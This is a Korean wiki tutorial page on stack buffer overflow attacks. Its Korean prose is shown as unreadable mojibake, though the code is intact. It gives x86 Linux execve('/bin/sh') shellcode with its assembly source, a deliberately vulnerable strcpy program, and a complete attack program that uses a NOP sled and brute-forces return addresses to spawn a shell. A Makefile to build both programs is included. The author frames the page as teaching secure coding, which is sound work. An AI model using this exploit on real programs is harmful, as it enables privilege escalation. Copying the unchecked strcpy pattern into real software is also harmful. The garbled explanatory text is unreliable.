· KLDP.org · KLDP.net · KLDP Wiki · KLDP BBS ·
Buffer over flow °ø°Ý¿¡ ´ëÇÑ ÀÌÇØ

Buffer over flow °ø°Ý¿¡ ´ëÇÑ ÀÌÇØ

  • ÀÛ¼ºÀÚ
    Á¶ÀçÇõ(Mminzkn@minzkn.com)

  • °íÄ£°úÁ¤
    2004³â 12¿ù 4ÀÏ : óÀ½¾¸

Áغñ

¿©±â¼­ sample() ÇÔ¼ö°¡ overflow exec shell ÄÚµåÀÌ°í¿ä.ÀÌ°Ç ÀÌ¹Ì °ø½ÄÈ­µÈ ÄÚµåÀ̱⠶§¹®¿¡ Á¦°¡ Á¶±Ý ¾ç³äÀ» Ãļ­ ÀÌÇØÇϱ⠽±°Ô ¸¸µé¾î º»°Ì´Ï´Ù. ÇØÅ·Àº ¹«Áö ½È¾îÇÏÁö¸¸ ÀÌ·±°Íµµ ¸íÈ®È÷ ¾Ë¾ÆµÖ¾ß ÀÚ½ÅÀÇ Äڵ尡 Æ°Æ°ÇØÁú°Ì´Ï´Ù. Àý´ë·Î BOF(Buffer Over Flow)´çÇÒ ÄÚµå´Â ¸¸µéÁö ¸¶¼¼¿ä. À̱ÛÀ» ÀÐ°í¼­µµ BOFÃë¾à ÄÚµå ¸¸µå´Â »ç¶÷Àº ¹Ùº¸~

¾Æ·¡¿Í °°Àº Äڵ带 ¸¸µé±â À§Çؼ­´Â ´ÙÀ½°ú °°Àº ´Ü°è¸¦ ÁøÇàÇÏ¿© Äڵ带 ¸¸µì´Ï´Ù.

  1. sample() ÇÔ¼ö¸¦ ¸¸µç´Ù.

    Á¶°Ç: ½ºÆ®¸µ ÇÔ¼ö¸¦ °ø°ÝÇϱâ À§ÇÑ ÄÚµåÀ̹ǷΠ¹Ýµå½Ã Äڵ峻¿¡´Â 0x00 ÀÌ ¾ø¾î¾ß ÇÕ´Ï´Ù. ±×·¡¼­ strcpy ¿¡ ÀÇÇؼ­ °ø°ÝÄڵ尡 º¹»çµÉ¼ö ÀÖ°ÚÁö¿ä. ¿ø¸®: ÀÏ´Ü jmp ·Î call ÇÔ¼ö·Î ºÐ±âÅä·Ï ƲÀ» ¸¸µê´Ï´Ù. À̶§ near °¡ ¾Æ´Ñ short ÇüÅÂÀÇ ºÐ±â¿©¾ß ÇÕ´Ï´Ù. ÀÌÁ¦ call ¹Ù·Î ÇÏ´Ü¿¡´Â "/bin/sh\0" À» ³Ö´Â°ÍÀÌ°í ÀÌ°ÍÀº call ¿¡ ÀÇÇؼ­ ±× ÁÖ¼Ò¸¦ ì±æ¼ö ÀÖ½À´Ï´Ù. ±×·¡¼­ call ·Î ºÐ±âÈÄ popl À» ÅëÇؼ­ "/bin/sh" ÀÇ ÁÖ¼Ò¸¦ ¾ò¾î³À´Ï´Ù. ±× ´ÙÀ½¿¡´Â execve(System call 0x0b¹ø)À» ÀÌ¿ëÇؼ­ ½ÇÇàÇÏ´Â Äڵ带 »ý¼ºÇÕ´Ï´Ù. ¿ª½Ã ÁÖÀÇÇÒÁ¡Àº ±â°è¾î»óÅ¿¡¼­ 0x00ÀÌ ÀÖÀ¸¸é ¾ÈµË´Ï´Ù. ±×¸®°í execve½ÇÇàÈÄ Á¾·áÅä·Ï exit(System call 0x01¹ø)À» È£ÃâÇÏ¿© Á¾·á½Ãŵ´Ï´Ù.

  2. ÀÌÁ¦ ÀÏ´Ü ÄÄÆÄÀϸ¸ ÇÕ´Ï´Ù.

  3. objdump -D <¸ñÀûÆÄÀÏ.o> ¸¦ »ç¿ëÇÏ¿© Äڵ带 ¿ª ¾î¼ÀºíÇÑ »óŸ¦ È®ÀÎÇÕ´Ï´Ù. ¿©±â¼­ sample ¶óº§À» ã¾Æ¼­ stack frame À» »©°í jmp ºÎÅÍ º¹»çÇÏ¿© ¹è¿­À» ¸¸µê´Ï´Ù.

  4. ÀÌÁ¦ sample ÇÔ¼ö´Â mz_shell_code ·Î ¸¸µé¾î Áø »óÅÂÀÌ°í ½ÇÁ¦ Å×½ºÆ®¸¦ À§ÇÑ ÇÔ¼ö¸¦ ¸¸µé¾î¾ß ÇÕ´Ï´Ù. (½ÇÁ¦ °ø°ÝÄڵ忡´Â bof() ÇÔ¼ö°¡ ¾Æ´Ï¶ó ÇÁ·Î±×·¥ ÀÚüÀÇ ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ÀÌ µÉ°Ì´Ï´Ù.)

  5. ÀÌÁ¦ bof() ÇÔ¼ö¿¡´Â ÇÑ°³ÀÇ dword º¯¼ö¸¦ ¼±¾ðÇÏ°í ÀÌ ÁÖ¼Ò¸¦ ÃëÇÏ¿© dword º¯¼ö ÀÚü Å©±â 4¸¦ ´õÇÏ°í ±×·ÎºÎÅÍ ´Ù½Ã stack frame À» °Ç³Ê¶ç±â À§Çؼ­ 4¸¦ ´õÇÑ À§Ä¡¿¡ mz_shell_code ÀÇ ÁÖ¼Ò¸¦ ÀúÀåÇÕ´Ï´Ù.

  6. ÀÌÁ¦ bof ÇÔ¼ö´Â ¹öÆÛ¿À¹öÇ÷ç¿ì¿¡ ÀÇÇؼ­ °ø°Ý´çÇÑ ÇÔ¼öÀÇ ÀüÇüÀûÀÎ »óÅ°¡ µÇ¾ú½À´Ï´Ù.

  7. bof °¡ ¸®ÅϵǸé mz_shell_code ·Î ºÐ±âÇÏ°Ô µÇ°í ¿øÇÏ´Â /bin/sh °¡ ½ÇÇàµÇ¸ç À̷μ­ ±ÇÇÑÀ» ÃëµæÇÕ´Ï´Ù.

Âü°í·Î execve system call ÀÇ ³»¿ëÀº ´ÙÀ½°ú °°½À´Ï´Ù.
%%eax = 0x0b
%%ebx = path/filename Æ÷ÀÌÅÍ
%%ecx = ÀÎÀÚ ¸®½ºÆ® Æ÷ÀÎÅÍ
%%edx = ȯ°æº¯¼ö ¸®½ºÆ® Æ÷ÀÎÅÍ
int $0x80


±×¸®°í exit system call ÀÇ ³»¿ëÀº ´ÙÀ½°ú °°½À´Ï´Ù.
%%eax = 0x01
%%ebx = exit code(return code)
int $0x80


/*
Copyright (c) Information Equipment co.,LTD.
All right reserved
Code by JaeHyuk Cho <mailto:minzkn@infoeq.com>

CVSTAG="$Header: /home/httpd/kldp/wiki/data/text/RCS/BufferOverFlow,v 1.6 2008/06/25 06:52:15 kss Exp kss $"
*/

char __mz_shell_code__[] = {
"\xeb\x1d"               /* jmp    0f               */
                          /* 1:                      */
"\x5e"                   /* pop    %esi             */               /* call ¿¡ ÀÇÇؼ­ "/bin/sh" ÀÇ ÁÖ¼Ò°¡ ´ã°ÜÀÖ°Ô µÊ. */
"\x89\x76\x08"           /* mov    %esi,0x8(%esi)   */
"\x31\xc0"               /* xor    %eax,%eax        */
"\x88\x46\x07"           /* mov    %al,0x7(%esi)    */
"\x89\x46\x0c"           /* mov    %eax,0xc(%esi)   */
"\xb0\x0b"               /* mov    $0x0b,%al        */
"\x89\xf3"               /* movl   %%esi, %%ebx     */
"\x8d\x4e\x08"           /* lea    0x8(%esi),%ecx   */
"\x31\xd2"               /* xor    %edx,%edx        */
"\xcd\x80"               /* int    $0x80            */
"\xb0\x01"               /* mov    $0x1,%al         */       /* exit system call part */
"\x31\xdb"               /* xor    %ebx,%ebx        */
"\xcd\x80"               /* int    $0x80            */
                          /* 0:                      */
"\xe8\xde\xff\xff\xff"   /* call   1b               */
"/bin/sh"
};

void bof(void)
{ /* Å×½ºÆ®¸¦ À§ÇØ °¡»óÀ¸·Î BOF ÇÇÆøµÈ ÇÔ¼ö¸¦ ²Ù¹Ì±â À§ÇÑ ÇÔ¼ö */
volatile unsigned long s_Entry;
s_Entry = (unsigned long)(&s_Entry) + sizeof(s_Entry) + sizeof(void *)/* frame */;
*((unsigned long *)s_Entry) = (unsigned long)(&__mz_shell_code__);
}

#if 0 /* __mz_shell_code__ source  : ÀÌ°ÍÀÌ BOF ½ÇÇàÄÚµåÀ̸ç ÀÌ°ÍÀ» Åä´ë·Î Äڵ尡 ¿Ï¼ºµË´Ï´Ù. */
void sample(void)
{
__asm__ volatile("nop\n\t");
__asm__ volatile(
  "jmp 0f\n\t"
  "1:\n\t"
  "popl %%esi\n\t"
  "movl %%esi, 0x08(%%esi)\n\t"
  "xorl %%eax, %%eax\n\t"
  "movb %%al, 0x07(%%esi)\n\t"
  "movl %%eax, 0x0c(%%esi)\n\t"
  "movb $0x0b, %%al\n\t"
  "movl %%esi, %%ebx\n\t"
  "leal 0x08(%%esi), %%ecx\n\t"
  "xorl %%edx, %%edx\n\t"
  "int $0x80\n\t"
  "movb $0x01, %%al\n\t"
  "xorl %%ebx, %%ebx\n\t"
  "int $0x80\n\t"
  "0:\n\t"
  "call 1b\n\t"
  ".string \"/bin/bash\"\n\t"
  :
  :
);
__asm__ volatile("nop\n\t");
}
#endif 

int main(void)
{
bof();
return(0);
}


½ÇÁ¦ °ø°ÝÆÐÅÏ

½ÇÁ¦·Î °ø°ÝÀÌ ¾î¶»°Ô ÀÌ·ç¾îÁö´ÂÁö Á÷Á¢ °æÇèÇغÁ¾ß ÀÚ½ÅÀÇ Äڵ带 ´õ Æ°Æ°È÷ ÇÒ¼ö ÀÖÀ»°Ì´Ï´Ù. ²À Çѹø ½Ç½ÀÇغ¸½Ã°í º¸¾ÈÀÇ Á߿伺À» ÀÎÁöÇÏ½Ã°Ô µÇ¾úÀ¸¸é ÁÁ°Ú½À´Ï´Ù. ÀÚ! º¸¾È¿¡ ´ëÇؼ­ º°·Î ½Å°æ¾²Áö ¾Ê´Â ¾î¶² »ç¶÷ÀÌ ´ÙÀ½°ú °°Àº Äڵ带 »ý¼ºÇÏ¿´´Ù°í ÇսôÙ. (½ÇÁ¦»óȲ¿¡¼­´Â º¹ÀâÇÑ ÇÁ·Î±×·¥°ÚÁö¸¸ ´ëÃæ ´ÙÀ½°ú °°Àº »óȲÀÌ Ãë¾àÇÕ´Ï´Ù.)
/* 
 Code by fooman
*/

#include <stdio.h>
#include <string.h>

int main(int s_Argc, char *s_Argv[])
{
 char s_Message[ 8 ];
 if(s_Argc <= 1)
 {
  fprintf(stdout, "Usage: %s <Message>\n", s_Argv[0]);
  return(0);
 }
 strcpy(s_Message, s_Argv[1]);
 fputs(s_Message, stdout);
 return(0);
}

/* End of source */


ÀÚ! À§ÀÇ Äڵ带 ÀÏ´Ü test1.c ·Î ÀúÀåÇÏ°í test1 À̶ó´Â ½ÇÇàÆÄÀÏÀ» ¸¸µê´Ï´Ù. ÀÌÁ¦ ÀÌ°ÍÀº °ø°ÝÀÇ ´ë»óÀÔ´Ï´Ù. ±×·³ °ø°ÝÄڵ带 ¸¸µé¾î º¸°Ú½À´Ï´Ù. (ÀÌ°ÍÀÌ ½ÇÀü¿¡¼­ ¾²ÀÌ´Â °ø°Ý±â¹ýÀÔ´Ï´Ù. ÀÚ¼¼È÷ °üÂûÇغ¸¼¼¿ä.)
/*  
 Code by JaeHyuk Cho <mailto:minzkn@infoeq.com>
 Attack code
*/

#include <sys/types.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEF_ATTACK_PROGRAM      "./test1"
#define DEF_ATTACK_RANGE        (4 << 10) /* ÀûÁ¤ scan ¹üÀ§°ªÀ» ÃëÇÔ : ´ë»óüÀÇ ±Ô¸ð°¡ Ŭ¼ö·Ï ÀÌ °ªÀ» ´Ã·Á¾ß °ÚÁÒ? */
#define DEF_TARGET_ARRAY_SIZE   (8) /* test1.c ÀÇ s_MessageÀÇ Å©±â´Â 8À̹ǷΠ: ÀÌ°ÍÀº ½ÇÇèÄ¡·Î Àâ¾Æ³»¾ß ÇÔ */

char __mz_shell_code__[] = {
 "\xeb\x1d"               /* jmp    0f               */
                          /* 1:                      */
 "\x5e"                   /* pop    %esi             */
 "\x89\x76\x08"           /* mov    %esi,0x8(%esi)   */
 "\x31\xc0"               /* xor    %eax,%eax        */
 "\x88\x46\x07"           /* mov    %al,0x7(%esi)    */
 "\x89\x46\x0c"           /* mov    %eax,0xc(%esi)   */
 "\xb0\x0b"               /* mov    $0x0b,%al        */
 "\x89\xf3"               /* movl   %%esi, %%ebx     */
 "\x8d\x4e\x08"           /* lea    0x8(%esi),%ecx   */
 "\x31\xd2"               /* xor    %edx,%edx        */
 "\xcd\x80"               /* int    $0x80            */
 "\xb0\x01"               /* mov    $0x1,%al         */
 "\x31\xdb"               /* xor    %ebx,%ebx        */
 "\xcd\x80"               /* int    $0x80            */
                          /* 0:                      */
 "\xe8\xde\xff\xff\xff"   /* call   1b               */
 "/bin/sh"
 "\x00"
};

int main(void)
{
 unsigned long s_Address; /* ù¹ø° ½ºÅà º¯¼öÀÓÀ» ÁÖÀÇÇսôÙ. */
 char s_Arg[ DEF_TARGET_ARRAY_SIZE + 4 + sizeof(unsigned long) + sizeof(__mz_shell_code__) ];
 char *s_Exec[] = { DEF_ATTACK_PROGRAM, (char *)(&s_Arg[0]), (char *)0 };

 /* Àû´çÈ÷ Äڵ尡 ½ÇÇàµÇ±â À¯¸®Çϵµ·Ï nop(0x90)À» »ç¿ë */
 memset(&s_Arg[0], 0x90 /* nop */, DEF_TARGET_ARRAY_SIZE + 4);

 /* shell ½ÇÇà ±â°èÄÚµå º¹»ç */
 memcpy((void *)(&s_Arg[DEF_TARGET_ARRAY_SIZE + 4 + sizeof(unsigned long)]), (void *)(&__mz_shell_code__[0]), sizeof(__mz_shell_code__));

 s_Address = (unsigned long)(&s_Address) - DEF_ATTACK_RANGE; /* Ãʱâ scan ÁÖ¼Ò */
 do
 { /* ·çÇÁ¸¦ ±â´Ù·Áº¾½Ã´Ù. ^^ */
  fprintf(stdout, "ATTACK INFO : >> %08lXH <<\n", s_Address);
  *((unsigned long *)(&s_Arg[DEF_TARGET_ARRAY_SIZE + 4])) = s_Address;
  if(fork() == 0)
  {
   execvp(s_Exec[0], s_Exec);
   exit(0);
  }
  else wait(0);
  s_Address += sizeof(unsigned long);
 }while(1);

 fprintf(stdout, "\n\nBye.\n");

 return(0);
}

/* End of source */


ÀÌÁ¦ À§ÀÇ Äڵ带 test2.c ·Î ÀúÀåÇÏ°í test2·Î ½ÇÇàÆÄÀÏÀ» ¸¸µé°í test2 ¸¦ test1 ÀÌ Àִ°÷ ¿¡¼­ ½ÇÇàÇÕ´Ï´Ù. °æ¿ì¿¡ µû¶ó¼­ ½ÇÆи¦ Çϱ⵵ ÇÏÁö¸¸ ¾Æ¸¶µµ ´ëºÎºÐ Á¶±ÝÀÖ´Ù°¡ ½©ÀÌ ½ÇÇàµÇ´Â °ÍÀ» º¼¼ö ÀÖÀ»°Ì´Ï´Ù. ÄÄÆÄÀÏÀº ´ÙÀ½°ú ÇÕ´Ï´Ù.
all: test1 test2
clean: ;$(RM) *.o test1 test2
test1: test1.o ;gcc -s -o $@ $^
test2: test2.o ;gcc -s -o $@ $^
%.o:%.c ;gcc -O0 -Wall -Werror -c -o $@ $<

ID
Password
Join
Man's horizons are bounded by his vision.


sponsored by andamiro
sponsored by cdnetworks
sponsored by HP

Valid XHTML 1.0! Valid CSS! powered by MoniWiki
last modified 2008-06-25 15:52:15
Processing time 0.0060 sec